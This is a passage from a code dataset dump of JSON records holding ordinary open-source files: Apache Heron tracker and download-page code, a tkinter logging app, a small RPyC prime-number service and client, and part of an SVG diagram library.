self.extract_execution_state(topology)\n execution_state[\"has_physical_plan\"] = has_physical_plan\n execution_state[\"has_packing_plan\"] = has_packing_plan\n execution_state[\"has_tmanager_location\"] = has_tmanager_location\n execution_state[\"has_scheduler_location\"] = has_scheduler_location\n execution_state[\"status\"] = topology.get_status()\n\n topology_info[\"metadata\"] = self.extract_metadata(topology)\n topology_info[\"runtime_state\"] = self.extract_runtime_state(topology)\n\n topology_info[\"execution_state\"] = execution_state\n topology_info[\"logical_plan\"] = self.extract_logical_plan(topology)\n topology_info[\"physical_plan\"] = self.extract_physical_plan(topology)\n topology_info[\"packing_plan\"] = self.extract_packing_plan(topology)\n topology_info[\"tmanager_location\"] = self.extract_tmanager(topology)\n topology_info[\"scheduler_location\"] = self.extract_scheduler_location(topology)\n\n self.topology_infos[(topology.name, topology.state_manager_name)] = topology_info\n\n # topology_name should be at the end to follow the trend\n def get_topology_info(\n self,\n topology_name: str,\n cluster: str,\n role: Optional[str],\n environ: str,\n ) -> str:\n \"\"\"\n Returns the JSON representation of a topology\n by its name, cluster, environ, and an optional role parameter.\n Raises exception if no such topology is found.\n\n \"\"\"\n # Iterate over the values to filter the desired topology.\n for (tn, _), topology_info in self.topology_infos.items():\n execution_state = topology_info[\"execution_state\"]\n if (tn == topology_name and\n cluster == execution_state[\"cluster\"] and\n environ == execution_state[\"environ\"] and\n (not role or execution_state.get(\"role\") == role)\n ):\n return topology_info\n\n Log.info(\n f\"Count not find topology info for cluster={cluster!r},\"\n f\" role={role!r}, environ={environ!r}, role={role!r},\"\n f\" topology={topology_name!r}\"\n )\n raise Exception(\"No topology found\")\n"
},
{
"alpha_fraction": 0.6754460334777832,
"alphanum_fraction": 0.6801189184188843,
"avg_line_length": 31.923076629638672,
"blob_id": "63d491e2c89dd5fe9eb1673497df22e83df5f3f1",
"content_id": "40e30c95edaa63c9e7ddc1294a3d5ce71e572f0f",
"detected_licenses": [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4708,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 143,
"path": "/heron/tools/tracker/src/python/metricstimeline.py",
"repo_name": "joshfischer1108/incubator-heron",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\"\"\" metricstimeline.py \"\"\"\nfrom typing import List\n\nimport tornado.gen\n\nfrom heron.common.src.python.utils.log import Log\nfrom heron.proto import common_pb2\nfrom heron.proto import tmanager_pb2\n\n# pylint: disable=too-many-locals, too-many-branches, unused-argument\[email protected]\ndef get_metrics_timeline(\n tmanager: tmanager_pb2.TManagerLocation,\n component_name: str,\n metric_names: List[str],\n instances: List[str],\n start_time: int,\n end_time: int,\n callback=None,\n) -> dict:\n \"\"\"\n Get the specified metrics for the given component name of this topology.\n Returns the following dict on success:\n {\n \"timeline\": {\n <metricname>: {\n <instance>: {\n <start_time> : <numeric value>,\n <start_time> : <numeric value>,\n ...\n }\n ...\n }, ...\n },\n \"starttime\": <numeric value>,\n \"endtime\": <numeric value>,\n \"component\": \"...\"\n }\n\n Returns the following dict on failure:\n {\n \"message\": \"...\"\n }\n \"\"\"\n # Tmanager is the proto object and must have host and port for stats.\n if not tmanager or not tmanager.host or not tmanager.stats_port:\n raise Exception(\"No Tmanager found\")\n\n host = tmanager.host\n port = tmanager.stats_port\n\n # Create the proto request object to get metrics.\n\n request_parameters = tmanager_pb2.MetricRequest()\n request_parameters.component_name = component_name\n\n # If no instances are given, metrics for all instances\n # are fetched by default.\n request_parameters.instance_id.extend(instances)\n request_parameters.metric.extend(metric_names)\n\n request_parameters.explicit_interval.start = start_time\n request_parameters.explicit_interval.end = end_time\n request_parameters.minutely = True\n\n # Form and send the http request.\n url = f\"http://{host}:{port}/stats\"\n request = tornado.httpclient.HTTPRequest(url,\n body=request_parameters.SerializeToString(),\n method='POST',\n request_timeout=5)\n\n Log.debug(\"Making HTTP call to fetch metrics\")\n Log.debug(\"url: \" + url)\n try:\n client = tornado.httpclient.AsyncHTTPClient()\n result = yield client.fetch(request)\n Log.debug(\"HTTP call complete.\")\n except tornado.httpclient.HTTPError as e:\n raise Exception(str(e))\n\n\n # Check the response code - error if it is in 400s or 500s\n if result.code >= 400:\n message = f\"Error in getting metrics from Tmanager, code: {result.code}\"\n raise Exception(message)\n\n # Parse the response from tmanager.\n response_data = tmanager_pb2.MetricResponse()\n response_data.ParseFromString(result.body)\n\n if response_data.status.status == common_pb2.NOTOK:\n if response_data.status.HasField(\"message\"):\n Log.warn(\"Received response from Tmanager: %s\", response_data.status.message)\n\n # Form the response.\n ret = {}\n ret[\"starttime\"] = start_time\n ret[\"endtime\"] = end_time\n ret[\"component\"] = component_name\n ret[\"timeline\"] = {}\n\n # Loop through all the metrics\n # One instance corresponds to one metric, which can have\n # multiple IndividualMetrics for each metricname requested.\n for metric in response_data.metric:\n instance = metric.instance_id\n\n # Loop through all individual metrics.\n for im in metric.metric:\n metricname = im.name\n if metricname not in ret[\"timeline\"]:\n ret[\"timeline\"][metricname] = {}\n if instance not in ret[\"timeline\"][metricname]:\n ret[\"timeline\"][metricname][instance] = {}\n\n # We get minutely metrics.\n # Interval-values correspond to the minutely mark for which\n # this metric value corresponds to.\n for interval_value in im.interval_values:\n ret[\"timeline\"][metricname][instance][interval_value.interval.start] = interval_value.value\n\n raise tornado.gen.Return(ret)\n"
},
{
"alpha_fraction": 0.5160354971885681,
"alphanum_fraction": 0.5223473310470581,
"avg_line_length": 36.34394836425781,
"blob_id": "7517dc2ac33ef0043d3d0ad7acf728122aa92dc0",
"content_id": "df631b5841afa8ce6ec0950e484e14685f719854",
"detected_licenses": [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 5862,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 157,
"path": "/website2/website/pages/en/download.js",
"repo_name": "joshfischer1108/incubator-heron",
"src_encoding": "UTF-8",
"text": "const React = require('react');\n\nconst CompLibrary = require('../../core/CompLibrary');\nconst MarkdownBlock = CompLibrary.MarkdownBlock; /* Used to read markdown */\nconst Container = CompLibrary.Container;\nconst GridBlock = CompLibrary.GridBlock;\n\nconst CWD = process.cwd();\n\nconst siteConfig = require(`${CWD}/siteConfig.js`);\nconst releases = require(`${CWD}/releases.json`);\nconst heronReleases = require(`${CWD}/heron-release.json`)\n\nfunction getLatestArchiveMirrorUrl(version, type) {\n return `https://www.apache.org/dyn/mirrors/mirrors.cgi?action=download&filename=incubator/heron/heron-${version}/heron-${version}-${type}.tar.gz`\n}\n\nfunction distUrl(version, type) {\n return `https://www.apache.org/dist/incubator/heron/heron-${version}/heron-${version}-${type}.tar.gz`\n}\n\nfunction archiveUrl(version, type) {\n if (version.includes('incubating')) {\n return `https://archive.apache.org/dist/incubator/heron/heron-${version}/apache-heron-v-${version}-${type}.tar.gz`\n } else {\n return `https://archive.apache.org/dist/heron/heron-${version}/apache-heron-v-${version}-${type}.tar.gz`\n }\n}\n\n\n\nclass Download extends React.Component {\n render() {\n const latestVersion = releases[0];\n const latestHeronVersion = heronReleases[0];\n const latestArchiveMirrorUrl = getLatestArchiveMirrorUrl(latestVersion, 'bin');\n const latestSrcArchiveMirrorUrl = getLatestArchiveMirrorUrl(latestVersion, 'src');\n const latestArchiveUrl = distUrl(latestVersion, 'bin');\n const latestSrcArchiveUrl = distUrl(latestVersion, 'src')\n\n const releaseInfo = releases.map(version => {\n return {\n version: version,\n binArchiveUrl: archiveUrl(version, 'bin'),\n srcArchiveUrl: archiveUrl(version, 'source')\n }\n });\n\n\n return (\n <div className=\"pageContainer\">\n <Container className=\"mainContainer documentContainer postContainer\">\n <div className=\"post\">\n <header className=\"postHeader\">\n <h1>Apache Heron (Incubating) downloads</h1>\n <hr />\n </header>\n\n <h2>Release notes</h2>\n <div>\n <p>\n <a href={`${siteConfig.baseUrl}${this.props.language}/release-notes`}>Release notes</a> for all Heron's versions\n </p>\n </div>\n\n <h2 id=\"latest\">Current version (Stable) {latestHeronVersion}</h2>\n <table className=\"versions\" style={{width:'100%'}}>\n <thead>\n <tr>\n <th>Release</th>\n <th>Link</th>\n <th>Crypto files</th>\n </tr>\n </thead>\n <tbody>\n\n\n <tr key={'source'}>\n <th>Source</th>\n <td>\n <a href={latestSrcArchiveMirrorUrl}>apache-heron-{latestVersion}-src.tar.gz</a>\n </td>\n <td>\n <a href={`${latestSrcArchiveUrl}.asc`}>asc</a>, \n <a href={`${latestSrcArchiveUrl}.sha512`}>sha512</a>\n </td>\n </tr>\n </tbody>\n </table>\n\n\n <h2>Release Integrity</h2>\n <MarkdownBlock>\n You must [verify](https://www.apache.org/info/verification.html) the integrity of the downloaded files.\n We provide OpenPGP signatures for every release file. This signature should be matched against the\n [KEYS](https://downloads.apache.org/incubator/heron/KEYS) file which contains the OpenPGP keys of\n Herons's Release Managers. We also provide `SHA-512` checksums for every release file.\n After you download the file, you should calculate a checksum for your download, and make sure it is\n the same as ours.\n </MarkdownBlock>\n\n <h2>Getting started</h2>\n <div>\n <p>\n\n Once you've downloaded a Heron release, instructions on getting up and running with a standalone cluster\n that you can run on your laptop can be found in the{' '}\n \n <a href={`${siteConfig.baseUrl}docs/getting-started-local-single-node`}>run Heron locally</a> tutorial.\n </p>\n </div>\n\n\n <h2 id=\"archive\">Older releases</h2>\n <table className=\"versions\">\n <thead>\n <tr>\n <th>Release</th>\n\n <th>Source</th>\n <th>Release notes</th>\n </tr>\n </thead>\n <tbody>\n {releaseInfo.map(\n info => {\n var sha = \"sha512\"\n if (info.version.includes('1.19.0-incubating') || info.version.includes('1.20.0-incubating')) {\n sha = \"sha\"\n }\n return info.version !== latestVersion && (\n <tr key={info.version}>\n <th>{info.version}</th>\n\n <td>\n <a href={info.srcArchiveUrl}>apache-heron-{info.version}-source.tar.gz</a>\n \n (<a href={`${info.srcArchiveUrl}.asc`}>asc</a>, \n <a href={`${info.srcArchiveUrl}.${sha}`}>{`${sha}`}</a>)\n </td>\n <td>\n <a href={`${siteConfig.baseUrl}${this.props.language}/release-notes#${info.version}`}>Release Notes</a>\n </td>\n </tr>\n )\n }\n )}\n </tbody>\n </table>\n </div>\n </Container>\n </div>\n );\n }\n}\n\nmodule.exports = Download;"
}
] | 4 |
dmitry040698/Simple_logger
|
https://github.com/dmitry040698/Simple_logger
|
628eb861ab6a08109f3150d46332809767222d92
|
6df396318ab854ab38409b1914507d1033957eb3
|
e3d094607fb4a8915c64e805716e884922f4fa88
|
refs/heads/main
| 2023-04-01T13:12:29.238687 | 2021-03-29T14:41:28 | 2021-03-29T14:41:28 | 352,676,620 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5515776872634888,
"alphanum_fraction": 0.573725700378418,
"avg_line_length": 31.632652282714844,
"blob_id": "f7e16ef435985b3c19c42ae778442558c1c88a69",
"content_id": "8509ff4f8523a6654f6017abae16171ec2a6c874",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3332,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 98,
"path": "/main.py",
"repo_name": "dmitry040698/Simple_logger",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\r\nfrom datetime import datetime\r\nfrom tkinter import scrolledtext\r\n\r\n\r\ndef window_tk():\r\n date_now = datetime.now().date()\r\n time_now = datetime.now().time()\r\n prior_error = \"ERROR\"\r\n prior_debug = \"DEBUG\"\r\n prior_trace = \"TRACE\"\r\n str_error = \"Error occured\"\r\n str_debug = \"DEBUG mode\"\r\n str_trace = \"Tracing\"\r\n\r\n window = tk.Tk()\r\n window.title(\"Lab 2\")\r\n window.geometry('430x400')\r\n\r\n label_name = tk.Label(text=\"Имя файла:\")\r\n label_name.grid(column=0, row=0, sticky=\"w\", padx=5, pady=5)\r\n\r\n file_name = tk.StringVar()\r\n entry_name = tk.Entry(textvariable=file_name)\r\n entry_name.grid(column=1, row=0, padx=5, pady=5)\r\n\r\n label_format = tk.Label(text=\"Формат сообщения:\")\r\n label_format.grid(column=0, row=1, sticky=\"w\", padx=5, pady=5)\r\n\r\n label_format_example = tk.Label(text=\"Пример формата: {prior} {data} {time} {message}\")\r\n label_format_example.grid(column=0, row=2, columnspan=3, sticky=\"w\", padx=5, pady=5)\r\n\r\n file_format = tk.StringVar()\r\n entry_format = tk.Entry(textvariable=file_format)\r\n entry_format.grid(column=1, row=1, padx=5, pady=5)\r\n\r\n def click_button_error(file_format2=\"\", name=\"\"):\r\n file_format2 = file_format2 + file_format.get()\r\n name = name + file_name.get()\r\n form = file_format2.format(message=str_error, data=date_now, time=time_now, prior=prior_error)\r\n result.insert(1.0, form + '\\n')\r\n print(form + '\\n')\r\n f = open('C:/Users/Dima/Downloads/' + name + '.csv', 'a')\r\n f.write(form + '\\n')\r\n f.close()\r\n\r\n def click_button_debug(file_format2=\"\", name=\"\"):\r\n file_format2 = file_format2 + file_format.get()\r\n name = name + file_name.get()\r\n form = file_format2.format(message=str_debug, data=date_now, time=time_now, prior=prior_debug)\r\n result.insert(1.0, form + '\\n')\r\n print(form + '\\n')\r\n f = open('C:/Users/Dima/Downloads/' + name + '.csv', 'a')\r\n f.write(form + '\\n')\r\n f.close()\r\n\r\n def click_button_trace(file_format2=\"\", name=\"\"):\r\n file_format2 = file_format2 + file_format.get()\r\n name = name + file_name.get()\r\n form = file_format2.format(message=str_trace, data=date_now, time=time_now, prior=prior_trace)\r\n result.insert(1.0, form + '\\n')\r\n print(form + '\\n')\r\n f = open('C:/Users/Dima/Downloads/' + name + '.csv', 'a')\r\n f.write(form + '\\n')\r\n f.close()\r\n\r\n button_error = tk.Button(\r\n text=\"Error\",\r\n width=6,\r\n height=2,\r\n command=click_button_error\r\n )\r\n button_error.grid(column=0, row=3, sticky=\"w\", padx=5, pady=5)\r\n\r\n button_debug = tk.Button(\r\n text=\"Debug\",\r\n width=6,\r\n height=2,\r\n command=click_button_debug\r\n )\r\n button_debug.grid(column=1, row=3, sticky=\"w\", padx=5, pady=5)\r\n\r\n button_trace = tk.Button(\r\n text=\"Trace\",\r\n width=6,\r\n height=2,\r\n command=click_button_trace\r\n )\r\n button_trace.grid(column=2, row=3, sticky=\"w\", padx=5, pady=5)\r\n\r\n result = scrolledtext.ScrolledText(window, width=50, height=15)\r\n result.grid(column=0, row=4, columnspan=3, padx=5, pady=5)\r\n\r\n window.mainloop()\r\n\r\n\r\nif __name__ == '__main__':\r\n window_tk()\r\n"
}
] | 1 |
blueitem/PrimeTestService
|
https://github.com/blueitem/PrimeTestService
|
329a136b3213cde7e728861a552338344fe1f783
|
88f8c4cb9cfecd0c4012d7f7ea3305fe968f0151
|
f3a7ebcb75168bc201a2ac26fc2c424ea780c911
|
refs/heads/master
| 2021-01-19T07:06:50.689290 | 2014-11-18T02:57:13 | 2014-11-18T02:57:13 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7652173638343811,
"alphanum_fraction": 0.7652173638343811,
"avg_line_length": 42.125,
"blob_id": "5d3a16dc8664f3223e3c8d90a09c4b383f2a9106",
"content_id": "914616d64b9b33dea3636105ef9137be6f7f17c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 345,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 8,
"path": "/README.md",
"repo_name": "blueitem/PrimeTestService",
"src_encoding": "UTF-8",
"text": "PrimeTestService\n================\n\nRuns a server that provides a Prime Testing Service for a client.\nThe client can call the Prime Testing Service from the server to:\n- Check whether a number inputed by the client is a prime number\n\nUsage: PrimeService.py must be running on the server machine, and PrimeClient must be run on the Client machine\n"
},
{
"alpha_fraction": 0.596203625202179,
"alphanum_fraction": 0.6220880150794983,
"avg_line_length": 21.745098114013672,
"blob_id": "1c9ddc3dc10ccb5ed83ddebff92c004198362dcb",
"content_id": "9cb947b42bdde99399bec9b46514c7be48798062",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1159,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 51,
"path": "/PrimeService.py",
"repo_name": "blueitem/PrimeTestService",
"src_encoding": "UTF-8",
"text": "\"\"\" \n Prime Service for Server, connects on port 12345\n PrimeService is a class that checks whether a number is a Prime number or not.\n\n (Python 3.4.2)\n \n Author: Jovaughn Chin\n Jonathan Gonzoph\n\n Date: 11/13/2014\n\n\"\"\"\n\n#import statement, math for sqrt in checkPrime, rpyc for connection\nimport math\nimport rpyc\n\n\nclass PrimeService(rpyc.Service):\n\n\n #unused\n def on_connect(self):\n # code that runs when a connection is created\n # (to init the service, if needed)\n pass\n #unused\n def on_disconnect(self):\n # code that runs when the connection has already closed\n # (to finalize the service, if needed)\n pass\n\n #given an integer, checks whether that integer is prime and returns true or false\n def exposed_isPrime(self,number):\n\n\n if number < 2:\n return False\n\n for i in range(2,int(math.sqrt(number)+1)):\n if (number % i) == 0:\n return False\n return True\n\n#starts the service on port 12345\nfrom rpyc.utils.server import ThreadedServer\n\nif __name__ == \"__main__\":\n \n t = ThreadedServer(PrimeService, port = 12345)\n t.start()"
},
{
"alpha_fraction": 0.6992385983467102,
"alphanum_fraction": 0.7195431590080261,
"avg_line_length": 21.457143783569336,
"blob_id": "4e8d707ee92e8c2aedef016f0ff145a0d849d21d",
"content_id": "b1d910cc67b50730732a4c548716e7c2b1d893e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 788,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 35,
"path": "/PrimeClient.py",
"repo_name": "blueitem/PrimeTestService",
"src_encoding": "UTF-8",
"text": "\"\"\" RPyc Client\n\n(Python 3.4.2)\n\nAuthor: Jovaughn Chin\n Jonathan Gonzoph\nDate: 11/17/2014\n\n\"\"\"\n\n\n# import rpyc for connection, ipaddress for IP validation\nimport rpyc\nimport ipaddress\n\n#ask Client the location/server of the Service he wish to access\nIPAddress= input(\" What is the location(IP) of the server you wish to access?: \")\n\n#Validate IP address\ntry:\n ipaddress.ip_address(IPAddress)\n\nexcept ValueError:\n\tIPAddress=input(\"Sorry, wrong input. Please input correct location(IP) of the server you wish to access?: \")\n\n# connect to server\nc=rypc.connect(IPAddress,12345) \n\n# validate input is a number\ntry:\n\tnum=int(input(\"What number would you like to check if prime?: \" ))\nexcept ValueError:\n num = int(input(\"Sorry, wrong input. Please input a number: \"))\n\nprint(c.root.isPrime(num))\n\n\n"
}
] | 3 |
iamlemec/gum
|
https://github.com/iamlemec/gum
|
cb418986b8b21c33544ad5b4618130c023c8107a
|
599bec120bbf9ee0a2b200871ee3dec21015b121
|
cdd09c338608214f58f5683cba0daf12499c8cd8
|
refs/heads/main
| 2023-06-27T23:01:00.160082 | 2021-07-30T03:59:14 | 2021-07-30T03:59:14 | 356,751,393 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.675000011920929,
"alphanum_fraction": 0.675000011920929,
"avg_line_length": 16.14285659790039,
"blob_id": "cb102922e88a2e53fb5745da0ac96964915f1ae6",
"content_id": "3768ce066d88021e1dbc7a083f1da24e9d850376",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 120,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 7,
"path": "/README.md",
"repo_name": "iamlemec/gum",
"src_encoding": "UTF-8",
"text": "<div align=\"center\">\n<img src=\"gum.svg\" alt=\"gum logo\"></img>\n</div>\n\n# gum\n\nGrammar for SVG diagram creation in Python\n"
},
{
"alpha_fraction": 0.5024194717407227,
"alphanum_fraction": 0.520240306854248,
"avg_line_length": 28.148832321166992,
"blob_id": "9dbe7bd190a006a076d0a89e0161c4b327af0163",
"content_id": "906fb60f8fa5846a7120ceff354e9355697dc9de",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29971,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 1028,
"path": "/gum/gum.py",
"repo_name": "iamlemec/gum",
"src_encoding": "UTF-8",
"text": "################################\n## gum — an svg diagram maker ##\n################################\n\nimport os\nimport copy\nimport numpy as np\nfrom collections import defaultdict\nfrom math import sqrt, tan, pi, inf, isinf\n\nfrom .fonts import get_text_size, get_text_shape\n\n##\n## defaults\n##\n\n# namespace\nns_svg = 'http://www.w3.org/2000/svg'\n\n# sizing\nsize_base = 250\nrect_base = (0, 0, 100, 100)\nfrac_base = (0, 0, 1, 1)\nprec_base = 13\n\n# specific elements\ndefault_tick_size = 0.05\ndefault_nticks = 5\ndefault_font_family = 'Montserrat'\ndefault_emoji_font = 'NotoColorEmoji'\ndefault_font_weight = 'Regular'\n\n##\n## basic tools\n##\n\ndef demangle(k):\n return k.replace('_', '-')\n\ndef rounder(x, prec=prec_base):\n if type(x) is str and x.endswith('px'):\n x1 = x[:-2]\n if x1.replace('.', '', 1).isnumeric():\n suf = 'px'\n x = float(x1)\n else:\n suf = ''\n if isinstance(x, (float, np.floating)):\n xr = round(x, ndigits=prec)\n if (xr % 1) == 0:\n ret = int(xr)\n else:\n ret = xr\n else:\n ret = x\n return str(ret) + suf\n\ndef props_repr(d, prec=prec_base):\n return ' '.join([\n f'{demangle(k)}=\"{rounder(v, prec=prec)}\"' for k, v in d.items()\n ])\n\ndef value_repr(x):\n if type(x) is str:\n return f'\"{x}\"'\n else:\n return x\n\ndef rule_repr(d, tab=4*' '):\n return '\\n'.join([f'{tab}{demangle(k)}: {value_repr(v)};' for k, v in d.items()])\n\ndef style_repr(d):\n return '\\n\\n'.join([\n tag + ' {\\n' + rule_repr(rules) + '\\n}' for tag, rules in d.items()\n ])\n\ndef dispatch(d, keys):\n rest = {}\n subs = defaultdict(dict)\n for k, v in d.items():\n for s in keys:\n if k.startswith(f'{s}_'):\n k1 = k[len(s)+1:]\n subs[s][k1] = v\n else:\n rest[k] = v\n return rest, *[subs[s] for s in keys]\n\ndef prefix(d, pre):\n return {f'{pre}_{k}': v for k, v in d.items()}\n\ndef dedict(d, default=None):\n if type(d) is dict:\n d = [(k, v) for k, v in d.items()]\n return [\n (x if type(x) is tuple else (x, default)) for x in d\n ]\n\ndef cumsum(a, zero=True):\n s = 0\n c = [0] if zero else []\n for x in a:\n s += x\n c.append(s)\n return c\n\n##\n## rect tools\n##\n\ndef pos_rect(r):\n if r is None:\n return frac_base\n elif type(r) is not tuple:\n return (0, 0, r, r)\n elif len(r) == 2:\n rx, ry = r\n return (0, 0, rx, ry)\n else:\n return r\n\ndef pad_rect(p, base=frac_base):\n xa, ya, xb, yb = base\n if p is None:\n return base\n elif type(p) is not tuple:\n return (xa+p, ya+p, xb-p, yb-p)\n elif len(p) == 2:\n px, py = p\n return (xa+px, ya+py, xb-px, yb-py)\n else:\n pxa, pya, pxb, pyb = p\n return (xa+pxa, ya+pya, xb-pxb, yb-pyb)\n\ndef rad_rect(p, default=None):\n if len(p) == 1:\n r, = p\n x, y = 0.5, 0.5\n rx, ry = r, r\n elif len(p) == 2:\n x, y = p\n rx, ry = default, default\n elif len(p) == 3:\n x, y, r = p\n rx, ry = r, r\n elif len(p) == 4:\n x, y, rx, ry = p\n return (x-rx, y-ry, x+rx, y+ry)\n\ndef merge_rects(rects):\n xa, ya, xb, yb = zip(*rects)\n return min(xa), min(ya), max(xb), max(yb)\n\ndef rect_dims(rect):\n xa, ya, xb, yb = rect\n w, h = xb - xa, yb - ya\n return w, h\n\ndef rect_aspect(rect):\n w, h = rect_dims(rect)\n return w/h\n\n##\n## context\n##\n\n# prect — outer rect (absolute)\n# frect — inner rect (fraction)\ndef map_coords(prect, frect=frac_base, aspect=None):\n pxa, pya, pxb, pyb = prect\n fxa, fya, fxb, fyb = frect\n\n pw, ph = pxb - pxa, pyb - pya\n fw, fh = fxb - fxa, fyb - fya\n\n pxa1, pya1 = pxa + fxa*pw, pya + fya*ph\n pxb1, pyb1 = pxa + fxb*pw, pya + fyb*ph\n\n if aspect is not None:\n pw1, ph1 = fw*pw, fh*ph\n asp1 = pw1/ph1\n\n if asp1 == aspect: # just right\n pass\n elif asp1 > aspect: # too wide\n pw2 = aspect*ph1\n dpw = pw1 - pw2\n pxa1 += 0.5*dpw\n pxb1 -= 0.5*dpw\n elif asp1 < aspect: # too tall\n ph2 = pw1/aspect\n dph = ph2 - ph1\n pya1 -= 0.5*dph\n pyb1 += 0.5*dph\n\n return pxa1, pya1, pxb1, pyb1\n\nclass Context:\n def __init__(self, rect=rect_base, prec=prec_base, **kwargs):\n self.rect = rect\n self.prec = prec\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n def __repr__(self):\n return str(self.__dict__)\n\n def __call__(self, rect, aspect=None):\n rect1 = map_coords(self.rect, rect, aspect=aspect)\n ctx = self.copy()\n ctx.rect = rect1\n return ctx\n\n def clone(self, **kwargs):\n kwargs1 = self.__dict__ | kwargs\n return Context(**kwargs1)\n\n def copy(self):\n return copy.copy(self)\n\n def deepcopy(self):\n return copy.deepcopy(self)\n\n##\n## core types\n##\n\nclass Element:\n def __init__(self, tag, unary=False, aspect=None, **attr):\n self.tag = tag\n self.unary = unary\n self.aspect = aspect\n self.attr = attr\n\n def __repr__(self):\n attr = props_repr(self.attr)\n return f'{self.tag}: {attr}'\n\n def __add__(self, other):\n return Container([self, other])\n\n def __or__(self, other):\n return HStack([self, other], expand=True)\n\n def __xor__(self, other):\n return HStack([self, other], expand=False)\n\n def __and__(self, other):\n return VStack([self, other], expand=True)\n\n def __mul__(self, other):\n return VStack([self, other], expand=False)\n\n def _repr_svg_(self):\n frame = Frame(self, padding=0.01)\n return SVG(frame).svg()\n\n def props(self, ctx):\n return self.attr\n\n def inner(self, ctx):\n return ''\n\n def svg(self, ctx=None, prec=prec_base):\n if ctx is None:\n ctx = Context(prec=prec)\n\n props = props_repr(self.props(ctx), prec=ctx.prec)\n pre = ' ' if len(props) > 0 else ''\n\n if self.unary:\n return f'<{self.tag}{pre}{props} />'\n else:\n inner = self.inner(ctx)\n return f'<{self.tag}{pre}{props}>{inner}</{self.tag}>'\n\n def save(self, fname, **kwargs):\n SVG(self, **kwargs).save(fname)\n\nclass Container(Element):\n def __init__(self, children=None, tag='g', **attr):\n super().__init__(tag=tag, **attr)\n if children is None:\n children = []\n if isinstance(children, dict):\n children = [(c, r) for c, r in children.items()]\n if not isinstance(children, list):\n children = [children]\n children = [\n (c if type(c) is tuple else (c, None)) for c in children\n ]\n children = [(c, pos_rect(r)) for c, r in children]\n self.children = children\n\n def inner(self, ctx):\n inside = '\\n'.join([c.svg(ctx(r, c.aspect)) for c, r in self.children])\n return f'\\n{inside}\\n'\n\n# this can have an aspect, which is utilized by layouts\nclass Spacer(Element):\n def __init__(self, aspect=None, **attr):\n super().__init__(tag=None, aspect=aspect, **attr)\n\n def svg(self, ctx=None):\n return ''\n\nclass SVG(Container):\n def __init__(self, children=None, size=size_base, clip=True, **attr):\n if children is not None and not isinstance(children, (list, dict)):\n children = [children]\n super().__init__(children=children, tag='svg', **attr)\n\n if clip:\n ctx = Context(rect=(0, 0, 1, 1))\n rects = [ctx(r, aspect=c.aspect).rect for c, r in self.children]\n total = merge_rects(rects)\n aspect = rect_aspect(total)\n else:\n aspect = 1\n\n if type(size) is not tuple:\n if aspect >= 1:\n size = size, size/aspect\n else:\n size = size*aspect, size\n\n self.size = size\n\n def _repr_svg_(self):\n return self.svg()\n\n def props(self, ctx):\n w, h = self.size\n base = dict(width=w, height=h, xmlns=ns_svg)\n return base | self.attr\n\n def svg(self, prec=prec_base):\n rect0 = (0, 0) + self.size\n ctx = Context(rect=rect0, prec=prec)\n return Element.svg(self, ctx=ctx)\n\n def save(self, path):\n s = self.svg()\n with open(path, 'w+') as fid:\n fid.write(s)\n\n##\n## layouts\n##\n\nclass Box(Container):\n def __init__(self, children, aspect=None, **attr):\n super().__init__(children=children, aspect=aspect, **attr)\n\nclass Frame(Container):\n def __init__(self, child, padding=0, margin=0, border=None, aspect=None, **attr):\n mrect = pad_rect(margin)\n prect = pad_rect(padding)\n trect = pad_rect(padding, base=mrect)\n\n children = []\n\n if border is not None:\n attr, rect_args = dispatch(attr, ['rect'])\n if aspect is None and child.aspect is not None:\n pw, ph = rect_dims(prect)\n raspect = child.aspect*(ph/pw)\n else:\n raspect = aspect\n rect = Rect(stroke_width=border, aspect=raspect, **rect_args)\n children += [(rect, mrect)]\n\n children += [(child, trect)]\n\n if aspect is None and child.aspect is not None:\n tw, th = rect_dims(trect)\n aspect = child.aspect*(th/tw)\n\n super().__init__(children=children, aspect=aspect, **attr)\n\nclass Point(Container):\n def __init__(self, child, x=0.5, y=0.5, r=0.5, aspect=None, **attr):\n if type(r) is not tuple:\n r = r,\n pos = x, y, *r\n aspect = child.aspect if aspect is None else aspect\n children = [(child, rad_rect(pos))]\n super().__init__(children=children, aspect=aspect, **attr)\n\nclass Scatter(Container):\n def __init__(self, locs, r=None, **attr):\n locs = dedict(locs)\n children = [\n (child, rad_rect(pos, default=r)) for child, pos in locs\n ]\n super().__init__(children=children, 